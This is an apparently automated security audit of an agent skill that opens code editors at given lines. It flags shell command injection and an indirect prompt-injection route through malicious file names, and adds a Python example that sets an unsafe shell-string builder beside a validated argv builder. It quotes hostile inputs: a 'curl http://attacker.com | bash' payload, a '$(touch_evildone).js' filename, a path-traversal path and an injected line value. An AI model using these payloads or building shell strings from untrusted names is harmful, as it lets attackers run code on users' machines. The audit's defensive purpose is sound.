code-walk-thru
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to execute shell commands using templates such as `code --goto <file_path>:<line_number>` and `vim +<line> <file>`.
  - Evidence: Instructions in SKILL.md explicitly list CLI commands for VSCode, PyCharm, IntelliJ, Zed, and Vim/Neovim.
  - Risk: If the agent interpolates a `<file_path>` or `<line_number>` containing shell metacharacters (e.g., `path/to/file; curl http://attacker.com | bash`) into a command string that is handed to a shell, the result is arbitrary command execution on the host machine.
- [PROMPT_INJECTION] (HIGH): The skill exposes a significant indirect prompt injection surface (Category 8) because it uses untrusted data (file paths and names taken from the environment) to construct executable commands.
  - Ingestion points: The agent determines the `<file_path>` from the local filesystem or project context.
  - Boundary markers: Absent. There are no instructions to sanitize or validate file paths before execution.
  - Capability inventory: Shell command execution (`subprocess.run` or similar) is required to fulfil the skill's purpose.
  - Sanitization: None. The skill provides no logic for escaping shell-sensitive characters, nor does it tell the agent to pass the path as a separate argument instead of through a shell.
  - Risk: An attacker could commit a file with a malicious name to a repository (e.g., `$(touch_evildone).js`). If a user asks the agent to "walk through" the project and the agent builds the editor command as a shell string, the payload embedded in the filename executes.
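Both findings above describe one mechanism: an untrusted file name reaching a shell. The Python block below is an example added to this audit page; it is not code from the audited skill or from Gen Agent Trust Hub. It places the flagged pattern (a string formatted for `shell=True`) next to a hardened builder that checks the line number, confines the path to the project root and passes the path as a single argv element, then exercises both against the audit's sample file name. The editor command forms (`code --goto <path>:<line>`, `vim +<line> <file>`) come from the audit text; the function names, the project-root check, the Python stub used in place of a real editor and the sample project are assumptions made here.

```python
"""Editor-open commands built from untrusted file names: unsafe string vs. validated argv.

Added example for this audit page, not code from the audited skill. Editor CLI
forms are taken from the audit text; everything else here is assumed.
"""
import shlex
import subprocess
import sys
import tempfile
from pathlib import Path

# One argv builder per editor (forms from the audit). The untrusted path is always
# a single list element, never joined into a shell string. "--" before the file
# stops vim from treating a name that starts with "-" or "+" as an option.
EDITOR_ARGV = {
    "code": lambda path, line: ["code", "--goto", f"{path}:{line}"],
    "vim": lambda path, line: ["vim", f"+{line}", "--", path],
}


def unsafe_command(editor: str, path: str, line) -> str:
    """The pattern the audit flags: untrusted values interpolated into a string
    that an agent would hand to subprocess.run(..., shell=True)."""
    return f"{editor} --goto {path}:{line}"


def safe_argv(editor: str, path: str, line, project_root) -> list[str]:
    """Validate inputs and return an argv list for subprocess.run(argv) with no shell."""
    if editor not in EDITOR_ARGV:
        raise ValueError(f"unsupported editor: {editor!r}")
    # bool is an int subclass; reject it along with strings and non-positive values.
    if isinstance(line, bool) or not isinstance(line, int) or line < 1:
        raise ValueError(f"line must be a positive integer, got {line!r}")
    root = Path(project_root).resolve()
    target = (root / path).resolve()  # an absolute 'path' replaces root; resolve() follows symlinks
    target.relative_to(root)          # ValueError if the target escapes the project root
    if not target.is_file():
        raise ValueError(f"not a regular file under the project root: {path!r}")
    return EDITOR_ARGV[editor](str(target), line)


def make_demo_project() -> Path:
    """Constructed sample project (assumption): one file whose name carries the
    audit's payload, as an attacker could commit it to a repository."""
    root = Path(tempfile.mkdtemp(prefix="walkthru_"))
    (root / "$(touch_evildone).js").write_text("console.log('hi');\n")
    return root


def run_with_stub(argv: list[str]) -> list[str]:
    """Run argv with the editor replaced by a Python stub that echoes its arguments,
    so the demo never launches an editor. Returns the arguments the child received."""
    stub = [sys.executable, "-c", "import sys; print('\\n'.join(sys.argv[1:]))"]
    out = subprocess.run(stub + argv[1:], capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


if __name__ == "__main__":
    root = make_demo_project()
    name = "$(touch_evildone).js"
    print("unsafe string:", unsafe_command("code", name, 12))  # payload is live under shell=True
    argv = safe_argv("code", name, 12, root)
    print("safe argv    :", shlex.join(argv))                  # payload is one quoted argument
    print("child saw    :", run_with_stub(argv))
    print("evildone created?", (root / "touch_evildone").exists())
    for editor, path, line in [("code", "../../etc/passwd", 1), ("vim", name, "1; id"), ("vim", name, 0)]:
        try:
            safe_argv(editor, path, line, root)
        except ValueError as err:
            print("rejected:", err)
```

The argv list removes the shell from the picture, so `$(...)`, `;` and `|` in a file name are inert; the root check is what stops the agent from being steered to open files outside the project, and the fixed templates (with `--` where the editor supports it) are what keep a name beginning with `-` from being parsed as an option.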
Recommendations
- AI detected serious security threats
Audit Metadata